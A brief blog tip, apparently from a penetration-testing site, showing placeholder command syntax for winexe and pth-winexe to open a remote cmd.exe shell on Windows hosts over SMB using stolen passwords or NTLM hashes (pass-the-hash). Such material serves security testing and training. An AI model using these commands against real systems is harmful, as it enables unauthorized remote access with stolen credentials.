Popping Remote Shells w/ winexe & pth-winexe on Windows

Posted on September 5, 2020September 5, 2020 by Harley in Tips & Tricks

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash.

Basic syntax w/ credentials.

winexe -U <domain/username>%<password> //<targetIP> cmd.exe

Basic syntax w/ NTLM hash (pass the hash technique).

pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe

Additional details about the command can be found here. https://tools.kali.org/maintaining-access/winexe

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

Infinite Logins

Infinite Logins

Popping Remote Shells w/ winexe & pth-winexe on Windows

Leave a Reply Cancel reply

Infinite Logins

Share this:

Like this:

Related

Leave a Reply Cancel reply